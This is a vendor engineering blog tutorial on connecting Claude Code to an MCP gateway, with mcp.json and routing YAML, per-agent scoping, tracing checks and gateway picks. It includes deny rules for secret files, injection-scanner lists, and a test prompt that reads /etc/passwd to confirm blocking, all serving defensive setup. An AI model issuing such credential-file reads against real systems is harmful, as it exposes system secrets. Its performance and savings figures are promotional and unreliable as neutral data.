Engineering

How to Connect Claude Code to an MCP Gateway in 2026

Wiring Claude Code to an MCP gateway 2026: mcp.json config, routing rules, per-server auth scoping, verification. Production checklist and gateway picks.

March 5, 2026

11 min read

ai-gateway 2026 claude-code mcp

Table of Contents

A Claude Code session with eight MCP servers registered opens eight long-lived connections, pulls every tool description into the model’s inventory, and is one prompt-injection away from invoking filesystem.write with arguments inherited from a poisoned description. Token spend you can see. MCP tool calls you can’t, not without a gateway between client and servers.

This is the implementation walkthrough. For the scored comparison see the sibling listicle. What you get here: four steps that produce a working connection (mcp.json edits, routing rules, per-server auth scoping, verification) plus the production checklist. Written for Claude Code 1.x as of May 2026. Examples use Future AGI Agent Command Center; the shape is identical for the other four gateways at the end.

The problem: what breaks without an MCP gateway in front of Claude Code

Three things break.

Tool calls disappear from observability. Claude Code logs one summary line per MCP invocation. The Anthropic dashboard records nothing about MCP, execution happens client-side. Every failure (a 4-second postgres.query, a filesystem.list that dropped 28K tokens of node_modules into the next turn, a 500 silently retried) is invisible to any production dashboard unless something between client and server captures it.

Each MCP server holds its own credential. API keys for one, OAuth for another, a STDIO process with no auth for the third. The Claude Code process is the keyring. After OX Security’s April 15, 2026 disclosure of the STDIO RCE class, arbitrary command execution through process names passed to STDIO across the official Python, TypeScript, Java, and Rust SDKs, centralising stopped being a convenience and became the production line.

Cost is non-obvious. Every MCP result is re-serialised into the next turn’s input. A tool returning a 12,000-token table adds 12,000 tokens to every subsequent turn for the rest of the session.

A gateway fixes all three. Topology: Claude Code → federation endpoint → registered servers. The gateway parses tools/list and tools/call, attaches span attributes, enforces auth, and forwards.

Prereqs

Claude Code 1.3+. Earlier versions don’t support per-server URL rewrites in mcp.json. Check with claude --version.
An MCP gateway endpoint. Hosted or self-hosted. Walkthrough uses https://gateway.futureagi.com/v1/mcp.
Gateway identity credentials. Future AGI uses FI_API_KEY and FI_SECRET_KEY. Others use the equivalent. Portkey virtual key, Bifrost API key, Kong consumer credentials, agentgateway OAuth client.
Downstream MCP server credentials. Whatever the old mcp.json held directly. Postgres connection string, GitHub PAT, S3 keys. These move to the gateway in step 3.
Network egress to the gateway. If self-hosted in your VPC, confirm the developer laptop can reach it.

Set the environment variables once in your shell profile.

# ~/.zshrc or ~/.bashrc
export FI_API_KEY="fi_live_..."
export FI_SECRET_KEY="..."
export FI_PROJECT="claude-code-prod"
export ANTHROPIC_BASE_URL="https://gateway.futureagi.com/v1/anthropic"

ANTHROPIC_BASE_URL handles the LLM-side gateway hop. It’s separate from the MCP gateway path; the two wire independently. A common mistake is configuring only one side and missing half the traffic.

Architecture overview

Claude Code talks to one federation endpoint; the gateway fans out to each MCP server with the right credential per call.

+-------------------+
|   Claude Code     |
|   (developer      |
|    laptop)        |
+--------+----------+
         |
         |  HTTPS / Streamable HTTP
         |  + OAuth 2.1 bearer (per-agent identity)
         |
         v
+-------------------+
|   MCP Gateway     |  <-- traceAI spans
|   (FAGI ACC,      |      MCP Security scanner
|    Portkey, etc.) |      OAuth 2.1 boundary
+--+----+----+----+-+      per-agent allowlist
   |    |    |    |
   |    |    |    +-------> filesystem MCP server
   |    |    +------------> postgres MCP server
   |    +-----------------> github MCP server
   +----------------------> custom search MCP server

The gateway holds the downstream credentials; Claude Code doesn’t. Each session arrives with a per-agent identity; the gateway rewrites scopes so the search server only sees a search-scoped token, never filesystem writes. Every tool call becomes an OpenTelemetry span keyed by mcp.tool.name, mcp.server.id, user.id, and session.id.

Step 1: register the gateway in Claude Code’s `mcp.json`

Claude Code reads MCP servers from ~/.claude/mcp.json plus a per-project override. The federation pattern is one entry pointing at the gateway; the gateway returns every downstream server through tools/list.

Edit ~/.claude/mcp.json:

{
  "mcpServers": {
    "fagi-gateway": {
      "transport": "streamable-http",
      "url": "https://gateway.futureagi.com/v1/mcp",
      "headers": {
        "Authorization": "Bearer ${FI_API_KEY}",
        "X-FI-Secret": "${FI_SECRET_KEY}",
        "X-FI-Project": "${FI_PROJECT}",
        "X-FI-Agent": "claude-code",
        "X-FI-User": "${USER}@futureagi.com"
      },
      "timeoutMs": 30000
    }
  }
}

Three things matter.

transport: streamable-http is the 2026 default. STDIO is the transport the April 15, 2026 disclosure targeted, don’t use it across the network. Local STDIO servers (a desktop file picker) get allowlisted server-side after the gateway is wired.

Header substitution with ${VAR}. Claude Code 1.3+ resolves env vars in mcp.json at load time, keeping secrets out of the file. If your team commits mcp.json to the repo, only variable names ship.

X-FI-User and X-FI-Agent. These headers drive per-developer attribution. X-FI-User is the identity claim, usually the SSO email. X-FI-Agent distinguishes Claude Code traffic from Cursor or notebook traffic. Without both, the dashboard collapses to aggregate numbers per project.

After saving, restart Claude Code (/quit then re-open). On startup it calls tools/list against the gateway, and the gateway returns the merged inventory across every downstream server. To the agent it looks like one big server with filesystem.read, pg_query, gh_create_issue, etc., all in one namespace.

Common pitfall: if downstream servers were registered directly in mcp.json previously, remove those entries before adding the gateway. Otherwise Claude Code holds two paths to the same tools and the dashboard double-counts.

Step 2: configure gateway routing rules

Tell the gateway which downstream MCP servers to federate and how to route tools/call requests. Shape varies by gateway. Future AGI uses YAML, either in the hosted console or in routes.yaml for self-hosted. A three-server federation:

# routes.yaml
mcp:
  federation_id: claude-code-prod
  transport: streamable-http
  servers:
    - name: filesystem
      transport: streamable-http
      url: https://filesystem-mcp.internal.example.com
      tool_prefix: ""
      auth:
        type: bearer
        secret_ref: FILESYSTEM_MCP_TOKEN
      allowlist:
        - filesystem.read
        - filesystem.list
        - filesystem.write
      timeout_ms: 5000

    - name: postgres
      transport: streamable-http
      url: https://postgres-mcp.internal.example.com
      tool_prefix: pg_
      auth:
        type: oauth2_client_credentials
        token_url: https://idp.example.com/oauth/token
        client_id_ref: POSTGRES_MCP_CLIENT_ID
        client_secret_ref: POSTGRES_MCP_CLIENT_SECRET
        scopes: [read]
      allowlist:
        - pg_query
      row_limit: 500
      timeout_ms: 8000

    - name: github
      transport: streamable-http
      url: https://api.github.com/mcp
      tool_prefix: gh_
      auth:
        type: bearer
        secret_ref: GITHUB_PAT
      allowlist:
        - gh_create_issue
        - gh_list_prs
        - gh_get_file
      timeout_ms: 10000

  scanners:
    discovery:
      - prompt_injection
      - tool_poisoning
      - secrets_in_description
    invocation:
      - path_traversal
      - sql_injection
      - command_injection
      - pii_in_arguments

  retries:
    max: 2
    backoff_ms: 250
    on_status: [502, 503, 504]

  rate_limits:
    per_user_per_minute: 120
    per_session_per_minute: 600

Four things to call out.

tool_prefix prevents namespace collisions when two servers expose a query or a list. Postgres query becomes pg_query.

allowlist stops the agent from invoking tools you forgot were registered. Start narrow, audit for a week, expand. Don’t use allow_all: true “just to test”, that’s what most teams forget to tighten before prod.

row_limit on pg_query is the kind of per-server guardrail that doesn’t exist in vanilla MCP. The gateway truncates oversized result sets, preventing a 50,000-row table from blowing the next turn’s context. In our usage, this single rule cuts Claude Code input-token spend by about 8% week-over-week.

scanners runs at both discovery and invocation. At discovery, the gateway scans tool description text the model will see, this is where tool-poisoning lives. At invocation, it scans arguments, where path traversal, SQL injection, and command injection live. The Future AGI Protect model family runs inline at 65 ms text / 107 ms image median time-to-label per arXiv 2510.13351. FAGI’s own fine-tuned Gemma 3n adapters across content moderation, bias detection, security/prompt-injection, and data privacy/PII, multi-modal across text/image/audio, a model family rather than a plugin chain. Error Feed sits alongside as FAGI’s part of the eval stack (the clustering and what-to-fix layer that feeds the self-improving evaluators via HDBSCAN clustering plus a Sonnet 4.5 Judge writing immediate_fix), auto-clustering related scanner-blocked or argument-validation failures into named issues (50 traces → 1 issue) with auto-written root cause plus quick fix plus long-term recommendation per issue.

After saving, reload (fagi gateway reload for self-hosted; automatic for hosted). The next tools/list reflects the new inventory.

Step 3: wire auth scoping per MCP server

Step 2 declared which credential each downstream server uses. Step 3 makes sure those credentials never widen the agent’s effective scope.

The pattern: the developer’s per-agent identity is the only credential that crosses the laptop boundary. The gateway holds every downstream secret. When it calls a downstream server, it presents a credential scoped to exactly the operations the per-agent identity is allowed to perform. The agent never sees the downstream credential.

Three concrete cases.

Case 1, wide bearer token (filesystem). The filesystem MCP token grants read-write to the entire mounted volume. You don’t want every Claude Code session to inherit “delete anything.” Use per-agent allowlist plus path scoping:

- name: filesystem
  auth:
    type: bearer
    secret_ref: FILESYSTEM_MCP_TOKEN
  per_agent_scope:
    "claude-code":
      allowlist: [filesystem.read, filesystem.list, filesystem.write]
      path_prefix: /workspace/
      deny_paths:
        - /workspace/secrets/
        - /workspace/.env
        - /workspace/.git/config

The downstream server still receives a wide token; the gateway enforces the narrow scope before forwarding. If Claude Code asks filesystem.write on /workspace/.env, the gateway returns a structured error and never touches the server.

Case 2. OAuth 2.1 client credentials with downscoping (Postgres). The IdP supports scope claims. The gateway requests a token with only the scopes the per-agent identity is allowed to use:

- name: postgres
  auth:
    type: oauth2_client_credentials
    token_url: https://idp.example.com/oauth/token
    client_id_ref: POSTGRES_MCP_CLIENT_ID
    client_secret_ref: POSTGRES_MCP_CLIENT_SECRET
    scopes: [read]
  per_agent_scope:
    "claude-code":
      allowlist: [pg_query]
      scope_override: [read]
      schema_allowlist: [public, analytics]

The gateway’s token could be issued with [read, write, admin]. The per-agent override clamps to [read] before the call. Claude Code can’t escalate.

Case 3. STDIO with sanitization (local-only). If you must use STDIO for a local server, run the sanitizer on process invocation:

- name: local_desktop
  transport: stdio
  command: /usr/local/bin/desktop-mcp
  args: ["--readonly"]
  sanitize_stdio: true
  per_agent_scope:
    "claude-code":
      allowlist: [desktop.list_apps]

sanitize_stdio: true blocks the April 15, 2026 RCE class by validating that command and args exactly match the config. Claude Code can’t spawn arbitrary processes through tool arguments.

Audit-mode tip: run with enforce: false for a week before enforcing. The audit log surfaces legitimate calls an over-tight policy would block. Then flip enforce: true. Skipping this is how a Friday deploy breaks half the developers Monday morning.

Step 4: verify tool calls are traced

Three checks. Run them in order.

Check 1, gateway sees the connection. From the Claude Code CLI:

$ claude
> /mcp list

One entry, fagi-gateway, status connected, with merged tools including filesystem.read, pg_query, gh_create_issue. Status error is almost always a missing or expired FI_API_KEY.

Check 2, tool call produces a span. Trigger an MCP call:

> read the package.json in this repo

Claude Code invokes filesystem.read. In the Agent Command Center dashboard, the session appears under “Recent traces” within seconds. The tree:

session_id: abc123
└── anthropic.messages.create  (model: claude-opus-4-7)
    └── mcp.tool.call  (tool: filesystem.read, server: filesystem)
        duration: 142ms
        attributes:
          mcp.tool.name: filesystem.read
          mcp.server.id: filesystem
          mcp.arguments: {"path": "package.json"}
          user.id: nikhil@futureagi.com
          fi.scanner.verdict: pass

If the model call is there but the MCP child span is missing, the gateway intercepted LLM traffic but not tool traffic. Re-check mcp.json, transport must be streamable-http.

Check 3, failures are captured. Trigger one on purpose:

> read the file at /etc/passwd

Path is outside /workspace/. Gateway returns 403, span records fi.scanner.verdict: blocked. Claude Code surfaces a tool error; agent recovers. The blocked call appears in the audit log with full argument payload.

If all three pass, the gateway is wired. Every MCP call now produces spans you can slice by tool, server, user, session, verdict.

Production checklist

Six operational concerns that bite in production.

Concern	What to check
Latency overhead	Measure p50 and p95 gateway hop. For text-only scanners, Protect adds 65 ms text median per arXiv 2510.13351; image scanning adds 107 ms image median. End-to-end MCP call latency should stay under ~250ms p95 for in-region gateway deployments; flag anything over 400ms.
Failure isolation	What happens if the gateway is down? Set Claude Code’s `timeoutMs` to fail fast (30s) and provide a documented fallback flow (“re-enable direct MCP for read-only servers under incident”). Do not silently fall back without auditing.
Cost attribution	Confirm `X-FI-User` and `X-FI-Agent` are populated on every request. Spot-check the dashboard — group-by-user should show every developer, not “unknown” buckets.
Audit log retention	Where do `blocked` and `error` spans live? For SOC 2, you want 90 days minimum; for HIPAA-adjacent workloads, 6 years. Configure span export to your long-term store, not just the live dashboard.
Cold start after deploy	The first call after a gateway restart will be 200-400ms slower while connection pools warm up. If your CI runs Claude Code on every PR, this matters; pre-warm the gateway with a synthetic `tools/list` call as part of the deploy script.
Rollback in 60 seconds	Have a procedure to disable the gateway hop in one command. For Future AGI, that is `unset ANTHROPIC_BASE_URL; mv ~/.claude/mcp.json ~/.claude/mcp.json.gateway; cp ~/.claude/mcp.json.direct ~/.claude/mcp.json`. Keep the direct-connection `mcp.json` checked in so you can restore in under a minute if the gateway has a bad day.

Tool-call success rate is the headline metric. Without a gateway, teams typically see 88-91% (timeouts, transient 5xx, arg-format issues). With a gateway plus retries and per-server timeouts, the same team climbs to 96-98%. Track it; roll back any config change that drops the number below baseline.

Brief gateway picks

Five gateways that implement the federation pattern. The walkthrough works against any with small changes to header names and routing-config syntax. For the scored comparison see the sibling listicle.

Future AGI Agent Command Center. Apache 2.0 traceAI plus hosted Agent Command Center. Only entry piping MCP spans into fi.evals and agent-opt for a self-improving loop, with dedicated MCP Security scanner inline at 65 ms text median time-to-label per arXiv 2510.13351.

Maxim Bifrost. Apache 2.0 Go binary doing LLM gateway plus MCP federation in one process. Vendor benchmark ~11µs P50 at 5K RPS (gateway overhead, not end-to-end). Pick when raw throughput is the binding constraint.

Portkey. Hosted with the most polished UI, virtual keys, mature RBAC. April 30, 2026 Palo Alto Networks acquisition merges roadmap into Prisma AIRS, verify multi-year continuity before signing.

Kong AI Gateway. Right pick if you already run Kong. AI Proxy plus OAuth plugins extend the existing stack. Plan two weeks of platform-team time for the MCP dashboard.

agentgateway.dev. Linux Foundation-hosted, Apache 2.0, vendor-neutral. Pick when governance is the binding constraint. Dashboard is thinner; pair with your own Grafana stack.

Where this fits in the FAGI loop

The walkthrough above is a one-time configuration. To make it self-improving, wire fi.evals to score every MCP span on tool-call accuracy and task-completion; feed low-score traces into agent-opt (Apache 2.0; six optimizers (ProTeGi, BayesianSearchOptimizer with Optuna, GEPAOptimizer, MetaPromptOptimizer, RandomSearchOptimizer, PromptWizardOptimizer), all sharing EarlyStoppingConfig). Typical Claude Code rewrite: drop 14 of 38 registered tools the agent never invokes, each costs ~180 input tokens per session at discovery. Net effect across a team running 22 sessions a day: input-token spend trends down 12-18% in four weeks, tool-call failure rate drops from ~12% to 3-4%. No developer behaviour change.

Apache 2.0 building blocks: traceAI, fi.evals, agent-opt at github.com/future-agi. Hosted Agent Command Center adds failure-cluster views, Protect guardrails, MCP Security scanner, RBAC, SOC 2 Type II, HIPAA BAA, AWS Marketplace.

Sources

Anthropic Claude Code MCP documentation, claude.ai/docs/claude-code/mcp
Model Context Protocol specification 2025-11-25, modelcontextprotocol.io/specification/2025-11-25
OX Security advisory on MCP STDIO RCE class (April 15, 2026), ox.security/blog/mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem
Future AGI Agent Command Center docs, docs.futureagi.com/docs/command-center
Future AGI Protect latency benchmarks, arxiv.org/abs/2510.13351 (65 ms text / 107 ms image median time-to-label)
Future AGI traceAI, github.com/future-agi/traceAI (Apache 2.0)
Future AGI agent-opt, github.com/future-agi/agent-opt (Apache 2.0)
Maxim Bifrost benchmarks, getmaxim.ai/bifrost/resources/benchmarks
Portkey AI gateway, portkey.ai
Kong AI Gateway, konghq.com/products/kong-ai-gateway
agentgateway.dev, agentgateway.dev (Linux Foundation project page)

Frequently asked questions

Do I have to use the Future AGI MCP gateway, or can I use a generic OSS one?

The walkthrough works against any of the five named above. Generic OSS choices include agentgateway.dev and Maxim Bifrost. You give up the evaluation-and-optimization loop and the named MCP Security scanner; you keep federation, per-agent OAuth 2.1, and OTel emission.

How do I roll back if the gateway breaks something?

Keep `~/.claude/mcp.json.direct` with the previous direct-server entries checked in. Rolling back is `unset ANTHROPIC_BASE_URL; cp ~/.claude/mcp.json.direct ~/.claude/mcp.json` plus a Claude Code restart. Under a minute. Practice once before you need it.

How much latency does the gateway add?

Protect inline scanning: 65 ms text median time-to-label per arXiv 2510.13351. End-to-end MCP call typically lands 150-250ms p95 for in-region. Over 400ms usually means a misconfigured downstream timeout or scanners running on payloads they should skip.

Is it safe to run this in production?

Yes, with the production checklist and an audit-mode rollout for the per-agent allowlist. The most common incident is over-tight allowlists blocking legitimate calls; audit-mode catches those before they hit developers.

What about MCP servers that only support STDIO?

Allowlist per agent with `sanitize_stdio: true` so the gateway validates the command-and-args envelope before spawning. Do not use STDIO across the network — the April 15, 2026 RCE class was STDIO-shape. For network MCP, always Streamable HTTP.

View all

Engineering

How to Reduce MCP Token Costs for Claude Code at Scale in 2026

Practical 2026 how-to for cutting MCP token spend on Claude Code at fleet scale: five levers, the mcp.json + gateway config, metrics that prove the cut.

Rishav Hada · Mar 24, 2026

12 min

Engineering

Running Claude Code with OpenAI Models in 2026: A Gateway Setup Guide

Run Claude Code against OpenAI GPT-5 and GPT-4 via a translation gateway in 2026: setup, ENV vars, config, then five gateways scored.

Rishav Hada · May 15, 2026

16 min

Engineering

How to Reduce Claude Code Token Costs by Up to 90 Percent in 2026

Cut Claude Code token spend with 5 stackable levers: cache_control, MCP-tool compilation, semantic caching, model right-sizing, pruning. Honest 90% read.

NVJK Kartik · Apr 11, 2026

13 min

The problem: what breaks without an MCP gateway in front of Claude Code

Prereqs

Architecture overview

Step 1: register the gateway in Claude Code’s mcp.json

Step 2: configure gateway routing rules

Step 3: wire auth scoping per MCP server

Step 4: verify tool calls are traced

Production checklist

Brief gateway picks

Where this fits in the FAGI loop

Related reading

Sources

Frequently asked questions

Step 1: register the gateway in Claude Code’s `mcp.json`